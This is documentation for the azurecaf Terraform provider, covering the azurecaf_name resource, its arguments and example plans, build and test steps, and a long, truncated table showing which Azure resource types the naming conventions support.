The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource
* Generate random characters to append at the end of the resource name
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions)
* Allow passthrough mode (simply validate the output)
## Example usage
## Combined with Azure resource
The data source evaluates the name before the resource got created and is visible at plan time.
```hcl
data "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
# prefixes = ["a", "b"]
# suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
resource "azurerm_resource_group" "rg" {
name = data.azurecaf_name.rg_example.result
location = "southeastasia"
}
```
```bash
data.azurecaf_name.rg_example: Reading...
data.azurecaf_name.rg_example: Read complete after 0s [id=rg-demogroup-wjyhr]
Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# azurerm_resource_group.rg will be created
+ resource "azurerm_resource_group" "rg" {
+ id = (known after apply)
+ location = "southeastasia"
+ name = "rg-demogroup-wjyhr"
}
Plan: 1 to add, 0 to change, 0 to destroy.
```
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffix added after the basename, this is can be used to append resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - default to ``0`` : configure additional characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resources and will be appended before suffix(ess).
* **random_seed** (optional) - default to ``0`` : Define the seed to be used for random generator. 0 will not be respected and will generate a seed based in the unix time of the generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, random, and are ignored. The resource prefixe is not added either to the resulting string
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object (same as the result value)
* **result** - The generated named for an Azure Resource based on the input parameter and the selected naming convention
<file_sep>/README.md
# Azure Cloud Adoption Framework - Terraform provider
This provider implements a set of methodologies for naming convention implementation including the default Microsoft Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging.
## Using the Provider
You can simply consume the provider from the Terraform registry from the following URL: [https://registry.terraform.io/providers/aztfmod/azurecaf/latest](https://registry.terraform.io/providers/aztfmod/azurecaf/latest), then add it in your provider declaration as follow:
```hcl
terraform {
required_providers {
azurecaf = {
source = "aztfmod/azurecaf"
version = "1.2.10"
}
}
}
```
The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource.
* Generate random characters to append at the end of the resource name.
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions).
* Allow passthrough mode (simply validate the output).
## Example usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
data "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
prefixes = ["a", "b"]
suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
output "rg_example" {
value = data.azurecaf_name.rg_example.result
}
```
```bash
data.azurecaf_name.rg_example: Reading...
data.azurecaf_name.rg_example: Read complete after 0s [id=a-b-rg-demogroup-sjdeh-y-z]
Changes to Outputs:
+ rg_example = "a-b-rg-demogroup-sjdeh-y-z"
```
The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[5_random_chars]:
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffix added after the basename, this is can be used to append resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - default to ``0`` : configure additional characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resources and will be appended before suffix(ess).
* **random_seed** (optional) - default to ``0`` : Define the seed to be used for random generator. 0 will not be respected and will generate a seed based in the unix time of the generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **resource_types** (optional) - a list of additional resource type should you want to use the same settings for a set of resources
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, random, and are ignored. The resource prefixe is not added either to the resulting string
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object
* **result** - The generated named for an Azure Resource based on the input parameter and the selected naming convention
* **results** - The generated name for the Azure resources based in the resource_types list
## Resource types
We define resource types as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging)
The comprehensive list of resource type can be found [here](./docs/resources/azurecaf_name.md)
## Building the provider
Clone repository to: $GOPATH/src/github.com/aztfmod/terraform-provider-azurecaf
```
$ mkdir -p $GOPATH/src/github.com/aztfmod; cd $GOPATH/src/github.com/aztfmod
$ git clone https://github.com/aztfmod/terraform-provider-azurecaf.git
```
Enter the provider directory and build the provider
```
$ cd $GOPATH/src/github.com/aztfmod/terraform-provider-azurecaf
$ make build
```
## Developing the provider
If you wish to work on the provider, you'll first need Go installed on your machine (version 1.13+ is required). You'll also need to correctly setup a GOPATH, as well as adding $GOPATH/bin to your $PATH.
To display the makefile help run `make` or `make help`.
To compile the provider, run make build. This will build the provider and put the provider binary in the $GOPATH/bin directory.
```
$ make build
...
$ $GOPATH/bin/terraform-provider-azurecaf
...
```
## Testing
Running the acceptance test suite requires does not require an Azure subscription.
to run the unit test:
```
make unittest
```
to run the integration test
```
make test
```
## Related repositories
| Repo | Description |
|--------------------------------------------------------------------------------------------------|------------------------------------------------------------|
| [caf-terraform-landingzones](https://github.com/azure/caf-terraform-landingzones) | landing zones repo with sample and core documentations |
| [rover](https://github.com/aztfmod/rover) | devops toolset for operating landing zones |
| [azure_caf_provider](https://github.com/aztfmod/terraform-provider-azurecaf) | custom provider for naming conventions |
| [module](https://registry.terraform.io/modules/aztfmod) | official CAF module available in the Terraform registry |
## Community
Feel free to open an issue for feature or bug, or to submit a PR.
In case you have any question, you can reach out to tf-landingzones at microsoft dot com.
You can also reach us on [Gitter](https://gitter.im/aztfmod/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
## Contributing
information about contributing can be found at [CONTRIBUTING.md](.github/CONTRIBUTING.md)
## Resource Status
This is the current compreheensive status of the implemented resources in the provider comparing with the current list of resources in the azurerm terraform provider.
|resource | status |
|---|---|
|azurerm_aadb2c_directory | ✔ |
|azurerm_advanced_threat_protection | ❌ |
|azurerm_advisor_recommendations | ❌ |
|azurerm_analysis_services_server | ✔ |
|azurerm_api_management | ✔ |
|azurerm_api_management_api | ✔ |
|azurerm_api_management_api_diagnostic | ❌ |
|azurerm_api_management_api_operation | ❌ |
|azurerm_api_management_api_operation_policy | ❌ |
|azurerm_api_management_api_operation_tag | ✔ |
|azurerm_api_management_api_policy | ❌ |
|azurerm_api_management_api_schema | ❌ |
|azurerm_api_management_api_version_set | ❌ |
|azurerm_api_management_authorization_server | ❌ |
|azurerm_api_management_backend | ✔ |
|azurerm_api_management_certificate | ✔ |
|azurerm_api_management_custom_domain | ✔ |
|azurerm_api_management_diagnostic | ❌ |
|azurerm_api_management_gateway | ✔ |
|azurerm_api_management_group | ✔ |
|azurerm_api_management_group_user | ✔ |
|azurerm_api_management_identity_provider_aad | ❌ |
|azurerm_api_management_identity_provider_facebook | ❌ |
|azurerm_api_management_identity_provider_google | ❌ |
|azurerm_api_management_identity_provider_microsoft | ❌ |
|azurerm_api_management_identity_provider_twitter | ❌ |
|azurerm_api_management_logger | ✔ |
|azurerm_api_management_named_value | ❌ |
|azurerm_api_management_openid_connect_provider | ❌ |
|azurerm_api_management_product | ❌ |
|azurerm_api_management_product_api | ❌ |
|azurerm_api_management_product_group | ❌ |
|azurerm_api_management_product_policy | ❌ |
|azurerm_api_management_property | ❌ |
|azurerm_api_management_subscription | ❌ |
|azurerm_api_management_user | ✔ |
|azurerm_app_configuration | ✔ |
|azurerm_app_service | ✔ |
|azurerm_app_service_active_slot | ❌ |
|azurerm_app_service_certificate | ❌ |
|azurerm_app_service_certificate_order | ❌ |
|azurerm_app_service_custom_hostname_binding | ❌ |
|azurerm_app_service_environment | ✔ |
|azurerm_app_service_hybrid_connection | ❌ |
|azurerm_app_service_plan | ✔ |
|azurerm_app_service_slot | ❌ |
|azurerm_app_service_slot_virtual_network_swift_connection | ❌ |
|azurerm_app_service_source_control_token | ❌ |
|azurerm_app_service_virtual_network_swift_connection | ❌ |
|azurerm_application_gateway | ✔ |
|azurerm_application_insights | ✔ |
|azurerm_application_insights_analytics_item | ❌ |
|azurerm_application_insights_api_key | ❌ |
|azurerm_application_insights_web_test | ✔ |
|azurerm_application_security_group | ✔ |
|azurerm_attestation | ❌ |
|azurerm_automation_account | ✔ |
|azurerm_automation_certificate | ✔ |
|azurerm_automation_connection | ❌ |
|azurerm_automation_connection_certificate | ❌ |
|azurerm_automation_connection_classic_certificate | ❌ |
|azurerm_automation_connection_service_principal | ❌ |
|azurerm_automation_credential | ✔ |
|azurerm_automation_dsc_configuration | ❌ |
|azurerm_automation_dsc_nodeconfiguration | ❌ |
|azurerm_automation_hybrid_runbook_worker_group | ✔ |
|azurerm_automation_job_schedule | ✔ |
|azurerm_automation_module | ❌ |
|azurerm_automation_runbook | ✔ |
|azurerm_automation_schedule | ✔ |
|azurerm_automation_variable_bool | ❌ |
|azurerm_automation_variable_datetime | ❌ |
|azurerm_automation_variable_int | ❌ |
|azurerm_automation_variable_string | ❌ |
|azurerm_availability_set | ✔ |
|azurerm_backup_container_storage_account | ❌ |
|azurerm_backup_policy_file_share | ❌ |
|azurerm_backup_policy_vm | ❌ |
|azurerm_backup_protected_file_share | ❌ |
|azurerm_backup_protected_vm | ❌ |
|azurerm_bastion_host | ✔ |
|azurerm_batch_account | ✔ |
|azurerm_batch_application | ✔ |
|azurerm_batch_certificate | ✔ |
|azurerm_batch_pool | ✔ |
|azurerm_blueprint_assignment | ❌ |
|azurerm_blueprint_definition | ❌ |
|azurerm_blueprint_published_version | ❌ |
|azurerm_bot_channel_directline | ✔ |
|azurerm_bot_channel_email | ❌ |
|azurerm_bot_channel_ms_teams | ✔ |
|azurerm_bot_channel_slack | ✔ |
|azurerm_bot_channels_registration | ✔ |
|azurerm_bot_connection | ✔ |
|azurerm_bot_web_app | ✔ |
|azurerm_cdn_endpoint | ✔ |
|azurerm_cdn_frontdoor_custom_domain | ✔ |
|azurerm_cdn_frontdoor_endpoint | ✔ |
|azurerm_cdn_frontdoor_firewall_policy | ✔ |
|azurerm_cdn_frontdoor_origin | ✔ |
|azurerm_cdn_frontdoor_origin_group | ✔ |
|azurerm_cdn_frontdoor_profile | ✔ |
|azurerm_cdn_frontdoor_route | ✔ |
|azurerm_cdn_frontdoor_rule | ✔ |
|azurerm_cdn_frontdoor_rule_set | ✔ |
|azurerm_cdn_frontdoor_secret | ✔ |
|azurerm_cdn_frontdoor_security_policy | ✔ |
|azurerm_cdn_profile | ✔ |
|azurerm_client_config | ❌ |
|azurerm_cognitive_account | ✔ |
|azurerm_communication_service | ✔ |
|azurerm_consumption_budget_resource_group | ✔ |
|azurerm_consumption_budget_subscription | ✔ |
|azurerm_container_app | ✔ |
|azurerm_container_app_environment | ✔ |
|azurerm_container_group | ❌ |
|azurerm_container_registry | ✔ |
|azurerm_container_registry_webhook | ✔ |
|azurerm_cosmosdb_account | ✔ |
|azurerm_cosmosdb_cassandra_keyspace | ❌ |
|azurerm_cosmosdb_gremlin_database | ❌ |
|azurerm_cosmosdb_gremlin_graph | ❌ |
|azurerm_cosmosdb_mongo_collection | ❌ |
|azurerm_cosmosdb_mongo_database | ❌ |
|azurerm_cosmosdb_sql_container | ❌ |
|azurerm_cosmosdb_sql_database | ❌ |
|azurerm_cosmosdb_sql_stored_procedure | ❌ |
|azurerm_cosmosdb_table | ❌ |
|azurerm_cost_management_export_resource_group | ❌ |
|azurerm_custom_provider | ✔ |
|azurerm_dashboard | ✔ |
|azurerm_data_factory | ✔ |
|azurerm_data_factory_dataset_azure_blob | ✔ |
|azurerm_data_factory_dataset_cosmosdb_sqlapi | ✔ |
|azurerm_data_factory_dataset_delimited_text | ✔ |
|azurerm_data_factory_dataset_http | ✔ |
|azurerm_data_factory_dataset_json | ✔ |
|azurerm_data_factory_dataset_mysql | ✔ |
|azurerm_data_factory_dataset_postgresql | ✔ |
|azurerm_data_factory_dataset_sql_server_table | ✔ |
|azurerm_data_factory_integration_runtime_managed | ✔ |
|azurerm_data_factory_integration_runtime_self_hosted | ❌ |
|azurerm_data_factory_linked_service_azure_blob_storage | ✔ |
|azurerm_data_factory_linked_service_azure_databricks | ✔ |
|azurerm_data_factory_linked_service_azure_file_storage | ❌ |
|azurerm_data_factory_linked_service_azure_function | ✔ |
|azurerm_data_factory_linked_service_azure_sql_database | ✔ |
|azurerm_data_factory_linked_service_cosmosdb | ✔ |
|azurerm_data_factory_linked_service_data_lake_storage_gen2 | ✔ |
|azurerm_data_factory_linked_service_key_vault | ✔ |
|azurerm_data_factory_linked_service_mysql | ✔ |
|azurerm_data_factory_linked_service_postgresql | ✔ |
|azurerm_data_factory_linked_service_sftp | ✔ |
|azurerm_data_factory_linked_service_sql_server | ✔ |
|azurerm_data_factory_linked_service_web | ✔ |
|azurerm_data_factory_pipeline | ✔ |
|azurerm_data_factory_trigger_schedule | ✔ |
|azurerm_data_lake_analytics_account | ✔ |
|azurerm_data_lake_analytics_firewall_rule | ✔ |
|azurerm_data_lake_store | ✔ |
|azurerm_data_lake_store_file | ❌ |
|azurerm_data_lake_store_firewall_rule | ✔ |
|azurerm_data_protection_backup_policy_blob_storage | ✔ |
|azurerm_data_protection_backup_policy_disk | ✔ |
|azurerm_data_protection_backup_policy_postgresql | ✔ |
|azurerm_data_protection_backup_vault | ✔ |
|azurerm_data_share | ❌ |
|azurerm_data_share_account | ❌ |
|azurerm_data_share_dataset_blob_storage | ❌ |
|azurerm_data_share_dataset_data_lake_gen1 | ❌ |
|azurerm_data_share_dataset_data_lake_gen2 | ❌ |
|azurerm_data_share_dataset_kusto_cluster | ❌ |
|azurerm_data_share_dataset_kusto_database | ❌ |
|azurerm_database_migration_project | ✔ |
|azurerm_database_migration_service | ✔ |
|azurerm_databricks_workspace | ✔ |
|azurerm_dedicated_hardware_security_module | ❌ |
|azurerm_dedicated_host | ✔ |
|azurerm_dedicated_host_group | ✔ |
|azurerm_dev_test_global_vm_shutdown_schedule | ❌ |
|azurerm_dev_test_lab | ✔ |
|azurerm_dev_test_linux_virtual_machine | ✔ |
|azurerm_dev_test_policy | ❌ |
|azurerm_dev_test_schedule | ❌ |
|azurerm_dev_test_virtual_network | ❌ |
|azurerm_dev_test_windows_virtual_machine | ✔ |
|azurerm_devspace_controller | ❌ |
|azurerm_digital_twins_endpoint_eventgrid | ✔ |
|azurerm_digital_twins_endpoint_eventhub | ✔ |
|azurerm_digital_twins_endpoint_servicebus | ✔ |
|azurerm_digital_twins_instance | ✔ |
|azurerm_disk_encryption_set | ✔ |
|azurerm_dns_a_record | ❌ |
|azurerm_dns_aaaa_record | ❌ |
|azurerm_dns_caa_record | ❌ |
|azurerm_dns_cname_record | ❌ |
|azurerm_dns_mx_record | ❌ |
|azurerm_dns_ns_record | ❌ |
|azurerm_dns_ptr_record | ❌ |
|azurerm_dns_srv_record | ❌ |
|azurerm_dns_txt_record | ❌ |
|azurerm_dns_zone | ✔ |
|azurerm_eventgrid_domain | ✔ |
|azurerm_eventgrid_domain_topic | ✔ |
|azurerm_eventgrid_event_subscription | ✔ |
|azurerm_eventgrid_system_topic | ❌ |
|azurerm_eventgrid_topic | ✔ |
|azurerm_eventhub | ✔ |
|azurerm_eventhub_authorization_rule | ✔ |
|azurerm_eventhub_cluster | ❌ |
|azurerm_eventhub_consumer_group | ✔ |
|azurerm_eventhub_namespace | ✔ |
|azurerm_eventhub_namespace_authorization_rule | ✔ |
|azurerm_eventhub_namespace_disaster_recovery_config | ✔ |
|azurerm_express_route_circuit | ✔ |
|azurerm_express_route_circuit_authorization | ❌ |
|azurerm_express_route_circuit_peering | ❌ |
|azurerm_express_route_gateway | ✔ |
|azurerm_federated_identity_credential | ✔ |
|azurerm_firewall | ✔ |
|azurerm_firewall_application_rule_collection | ❌ |
|azurerm_firewall_nat_rule_collection | ❌ |
|azurerm_firewall_network_rule_collection | ❌ |
|azurerm_firewall_policy | ✔ |
|azurerm_firewall_policy_rule_collection_group | ❌ |
|azurerm_frontdoor | ✔ |
|azurerm_frontdoor_custom_https_configuration | ❌ |
|azurerm_frontdoor_firewall_policy | ✔ |
|azurerm_function_app | ✔ |
|azurerm_function_app_host_keys | ❌ |
|azurerm_function_app_slot | ✔ |
|azurerm_hdinsight_cluster | ❌ |
|azurerm_hdinsight_hadoop_cluster | ✔ |
|azurerm_hdinsight_hbase_cluster | ✔ |
|azurerm_hdinsight_interactive_query_cluster | ✔ |
|azurerm_hdinsight_kafka_cluster | ✔ |
|azurerm_hdinsight_ml_services_cluster | ✔ |
|azurerm_hdinsight_rserver_cluster | ✔ |
|azurerm_hdinsight_spark_cluster | ✔ |
|azurerm_hdinsight_storm_cluster | ✔ |
|azurerm_healthcare_dicom_service | ✔ |
|azurerm_healthcare_fhir_service | ✔ |
|azurerm_healthcare_medtech_service | ✔ |
|azurerm_healthcare_service | ✔ |
|azurerm_healthcare_workspace | ✔ |
|azurerm_hpc_cache | ❌ |
|azurerm_hpc_cache_blob_target | ❌ |
|azurerm_hpc_cache_nfs_target | ❌ |
|azurerm_image | ✔ |
|azurerm_images | ❌ |
|azurerm_integration_service_environment | ✔ |
|azurerm_iot_security_device_group | ✔ |
|azurerm_iot_security_solution | ✔ |
|azurerm_iot_time_series_insights_access_policy | ❌ |
|azurerm_iot_time_series_insights_reference_data_set | ❌ |
|azurerm_iot_time_series_insights_standard_environment | ❌ |
|azurerm_iotcentral_application | ✔ |
|azurerm_iothub | ✔ |
|azurerm_iothub_certificate | ✔ |
|azurerm_iothub_consumer_group | ✔ |
|azurerm_iothub_dps | ✔ |
|azurerm_iothub_dps_certificate | ✔ |
|azurerm_iothub_dps_shared_access_policy | ✔ |
|azurerm_iothub_endpoint_eventhub | ❌ |
|azurerm_iothub_endpoint_servicebus_queue | ❌ |
|azurerm_iothub_endpoint_servicebus_topic | ❌ |
|azurerm_iothub_endpoint_storage_container | ❌ |
|azurerm_iothub_fallback_route | ❌ |
|azurerm_iothub_route | ❌ |
|azurerm_iothub_shared_access_policy | ✔ |
|azurerm_ip_group | ✔ |
|azurerm_key_vault | ✔ |
|azurerm_key_vault_access_policy | ❌ |
|azurerm_key_vault_certificate | ✔ |
|azurerm_key_vault_certificate_issuer | ❌ |
|azurerm_key_vault_key | ✔ |
|azurerm_key_vault_secret | ✔ |
|azurerm_kubernetes_cluster | ✔ |
|azurerm_kubernetes_cluster_node_pool | ❌ |
|azurerm_kubernetes_fleet_manager | ✔ |
|azurerm_kubernetes_service_versions | ❌ |
|azurerm_kusto_attached_database_configuration | ❌ |
|azurerm_kusto_cluster | ✔ |
|azurerm_kusto_cluster_customer_managed_key | ❌ |
|azurerm_kusto_cluster_principal_assignment | ❌ |
|azurerm_kusto_database | ✔ |
|azurerm_kusto_database_principal | ❌ |
|azurerm_kusto_database_principal_assignment | ❌ |
|azurerm_kusto_eventhub_data_connection | ✔ |
|azurerm_lb | ✔ |
|azurerm_lb_backend_address_pool | ✔ |
|azurerm_lb_backend_address_pool_address | ✔ |
|azurerm_lb_nat_pool | ✔ |
|azurerm_lb_nat_rule | ✔ |
|azurerm_lb_outbound_rule | ✔ |
|azurerm_lb_probe | ✔ |
|azurerm_lb_rule | ✔ |
|azurerm_lighthouse_assignment | ❌ |
|azurerm_lighthouse_definition | ❌ |
|azurerm_linux_virtual_machine | ✔ |
|azurerm_linux_virtual_machine_scale_set | ✔ |
|azurerm_linux_web_app | ✔ |
|azurerm_linux_web_app_slot | ⚠ |
|azurerm_local_network_gateway | ✔ |
|azurerm_log_analytics_cluster | ✔ |
|azurerm_log_analytics_data_export_rule | ❌ |
|azurerm_log_analytics_datasource_windows_event | ❌ |
|azurerm_log_analytics_datasource_windows_performance_counter | ❌ |
|azurerm_log_analytics_linked_service | ❌ |
|azurerm_log_analytics_linked_storage_account | ❌ |
|azurerm_log_analytics_saved_search | ❌ |
|azurerm_log_analytics_solution | ❌ |
|azurerm_log_analytics_storage_insights | ✔ |
|azurerm_log_analytics_workspace | ✔ |
|azurerm_logic_app_action_custom | ✔ |
|azurerm_logic_app_action_http | ✔ |
|azurerm_logic_app_integration_account | ✔ |
|azurerm_logic_app_trigger_custom | ✔ |
|azurerm_logic_app_trigger_http_request | ✔ |
|azurerm_logic_app_trigger_recurrence | ✔ |
|azurerm_logic_app_workflow | ✔ |
|azurerm_machine_learning_compute_instance | ✔ |
|azurerm_machine_learning_workspace | ✔ |
|azurerm_maintenance_assignment_dedicated_host | ❌ |
|azurerm_maintenance_assignment_virtual_machine | ❌ |
|azurerm_maintenance_configuration | ✔ |
|azurerm_managed_application | ❌ |
|azurerm_managed_application_definition | ❌ |
|azurerm_managed_disk | ✔ |
|azurerm_management_group | ❌ |
|azurerm_management_lock | ❌ |
|azurerm_maps_account | ✔ |
|azurerm_mariadb_configuration | ❌ |
|azurerm_mariadb_database | ✔ |
|azurerm_mariadb_firewall_rule | ✔ |
|azurerm_mariadb_server | ✔ |
|azurerm_mariadb_virtual_network_rule | ✔ |
|azurerm_marketplace_agreement | ❌ |
|azurerm_media_services_account | ❌ |
|azurerm_monitor_action_group | ✔ |
|azurerm_monitor_action_rule_action_group | ❌ |
|azurerm_monitor_action_rule_suppression | ❌ |
|azurerm_monitor_activity_log_alert | ❌ |
|azurerm_monitor_autoscale_setting | ✔ |
|azurerm_monitor_diagnostic_categories | ❌ |
|azurerm_monitor_diagnostic_setting | ✔ |
|azurerm_monitor_log_profile | ❌ |
|azurerm_monitor_metric_alert | ✔ |
|azurerm_monitor_private_link_scope | ✔ |
|azurerm_monitor_scheduled_query_rules_alert | ✔ |
|azurerm_monitor_scheduled_query_rules_log | ❌ |
|azurerm_monitor_smart_detector_alert_rule | ❌ |
|azurerm_mssql_database | ✔ |
|azurerm_mssql_database_extended_auditing_policy | ❌ |
|azurerm_mssql_database_vulnerability_assessment_rule_baseline | ❌ |
|azurerm_mssql_elasticpool | ✔ |
|azurerm_mssql_mi | ✔ |
|azurerm_mssql_server | ✔ |
|azurerm_mssql_server_extended_auditing_policy | ❌ |
|azurerm_mssql_server_security_alert_policy | ❌ |
|azurerm_mssql_server_vulnerability_assessment | ❌ |
|azurerm_mssql_virtual_machine | ❌ |
|azurerm_mysql_active_directory_administrator | ❌ |
|azurerm_mysql_configuration | ❌ |
|azurerm_mysql_database | ✔ |
|azurerm_mysql_firewall_rule | ✔ |
|azurerm_mysql_flexible_server | ✔ |
|azurerm_mysql_flexible_server_database | ✔ |
|azurerm_mysql_flexible_server_firewall_rule | ✔ |
|azurerm_mysql_server | ✔ |
|azurerm_mysql_server_key | ❌ |
|azurerm_mysql_virtual_network_rule | ✔ |
|azurerm_nat_gateway | ❌ |
|azurerm_nat_gateway_public_ip_association | ❌ |
|azurerm_netapp_account | ✔ |
|azurerm_netapp_pool | ✔ |
|azurerm_netapp_snapshot | ✔ |
|azurerm_netapp_volume | ✔ |
|azurerm_network_connection_monitor | ❌ |
|azurerm_network_ddos_protection_plan | ❌ |
|azurerm_network_interface | ✔ |
|azurerm_network_interface_application_gateway_backend_address_pool_association | ❌ |
|azurerm_network_interface_application_security_group_association | ❌ |
|azurerm_network_interface_backend_address_pool_association | ❌ |
|azurerm_network_interface_nat_rule_association | ❌ |
|azurerm_network_interface_security_group_association | ❌ |
|azurerm_network_packet_capture | ❌ |
|azurerm_network_profile | ❌ |
|azurerm_network_security_group | ✔ |
|azurerm_network_security_rule | ✔ |
|azurerm_network_service_tags | ❌ |
|azurerm_network_watcher | ✔ |
|azurerm_network_watcher_flow_log | ❌ |
|azurerm_nginx_deployment | ✔ |
|azurerm_notification_hub | ✔ |
|azurerm_notification_hub_authorization_rule | ✔ |
|azurerm_notification_hub_namespace | ✔ |
|azurerm_orchestrated_virtual_machine_scale_set | ❌ |
|azurerm_packet_capture | ❌ |
|azurerm_platform_image | ❌ |
|azurerm_point_to_site_vpn_gateway | ✔ |
|azurerm_policy_assignment | ❌ |
|azurerm_policy_definition | ❌ |
|azurerm_policy_remediation | ❌ |
|azurerm_policy_set_definition | ❌ |
|azurerm_postgresql_active_directory_administrator | ❌ |
|azurerm_postgresql_configuration | ❌ |
|azurerm_postgresql_database | ✔ |
|azurerm_postgresql_firewall_rule | ✔ |
|azurerm_postgresql_flexible_server | ✔ |
|azurerm_postgresql_flexible_server_configuration | ❌ |
|azurerm_postgresql_flexible_server_database | ✔ |
|azurerm_postgresql_flexible_server_firewall_rule | ✔ |
|azurerm_postgresql_server | ✔ |
|azurerm_postgresql_server_key | ❌ |
|azurerm_postgresql_virtual_network_rule | ✔ |
|azurerm_powerbi_embedded | ✔ |
|azurerm_private_dns_a_record | ❌ |
|azurerm_private_dns_aaaa_record | ❌ |
|azurerm_private_dns_cname_record | ❌ |
|azurerm_private_dns_mx_record | ❌ |
|azurerm_private_dns_ptr_record | ❌ |
|azurerm_private_dns_resolver | ✔ |
|azurerm_private_dns_resolver_dns_forwarding_ruleset | ✔ |
|azurerm_private_dns_resolver_forwarding_rule | ✔ |
|azurerm_private_dns_resolver_inbound_endpoint | ✔ |
|azurerm_private_dns_resolver_outbound_endpoint | ✔ |
|azurerm_private_dns_resolver_virtual_network_link | ✔ |
|azurerm_private_dns_srv_record | ❌ |
|azurerm_private_dns_txt_record | ❌ |
|azurerm_private_dns_zone | ✔ |
|azurerm_private_dns_zone_virtual_network_link | ✔ |
|azurerm_private_endpoint | ✔ |
|azurerm_private_endpoint_connection | ❌ |
|azurerm_private_link_service | ❌ |
|azurerm_private_link_service_endpoint_connections | ❌ |
|azurerm_proximity_placement_group | ❌ |
|azurerm_public_ip | ✔ |
|azurerm_public_ip_prefix | ✔ |
|azurerm_public_ips | ❌ |
|azurerm_purview_account | ✔ |
|azurerm_recovery_services_vault | ✔ |
|azurerm_redhat_openshift_cluster | ✔ |
|azurerm_redhat_openshift_domain | ✔ |
|azurerm_redis_cache | ✔ |
|azurerm_redis_firewall_rule | ✔ |
|azurerm_redis_linked_server | ❌ |
|azurerm_relay_hybrid_connection | ✔ |
|azurerm_relay_namespace | ✔ |
|azurerm_resource_group | ✔ |
|azurerm_resource_group_policy_assignment | ✔ |
|azurerm_resource_group_template_deployment | ❌ |
|azurerm_role_assignment | ✔ |
|azurerm_role_definition | ✔ |
|azurerm_route | ✔ |
|azurerm_route_filter | ❌ |
|azurerm_route_table | ✔ |
|azurerm_search_service | ❌ |
|azurerm_security_center_auto_provisioning | ❌ |
|azurerm_security_center_automation | ❌ |
|azurerm_security_center_contact | ❌ |
|azurerm_security_center_setting | ❌ |
|azurerm_security_center_subscription_pricing | ❌ |
|azurerm_security_center_workspace | ❌ |
|azurerm_sentinel_alert_rule | ❌ |
|azurerm_sentinel_alert_rule_ms_security_incident | ❌ |
|azurerm_sentinel_alert_rule_scheduled | ❌ |
|azurerm_service_fabric_cluster | ✔ |
|azurerm_service_fabric_mesh_application | ❌ |
|azurerm_service_fabric_mesh_local_network | ❌ |
|azurerm_service_fabric_mesh_secret | ❌ |
|azurerm_service_fabric_mesh_secret_value | ❌ |
|azurerm_servicebus_namespace | ✔ |
|azurerm_servicebus_namespace_authorization_rule | ✔ |
|azurerm_servicebus_namespace_network_rule_set | ❌ |
|azurerm_servicebus_queue | ✔ |
|azurerm_servicebus_queue_authorization_rule | ✔ |
|azurerm_servicebus_subscription | ✔ |
|azurerm_servicebus_subscription_rule | ✔ |
|azurerm_servicebus_topic | ✔ |
|azurerm_servicebus_topic_authorization_rule | ✔ |
|azurerm_shared_image | ✔ |
|azurerm_shared_image_gallery | ✔ |
|azurerm_shared_image_version | ❌ |
|azurerm_shared_image_versions | ❌ |
|azurerm_signalr_service | ✔ |
|azurerm_site_recovery_fabric | ❌ |
|azurerm_site_recovery_network_mapping | ❌ |
|azurerm_site_recovery_protection_container | ❌ |
|azurerm_site_recovery_protection_container_mapping | ❌ |
|azurerm_site_recovery_replicated_vm | ❌ |
|azurerm_site_recovery_replication_policy | ❌ |
|azurerm_snapshot | ❌ |
|azurerm_spatial_anchors_account | ❌ |
|azurerm_spring_cloud_app | ❌ |
|azurerm_spring_cloud_certificate | ❌ |
|azurerm_spring_cloud_service | ❌ |
|azurerm_sql_active_directory_administrator | ❌ |
|azurerm_sql_database | ❌ |
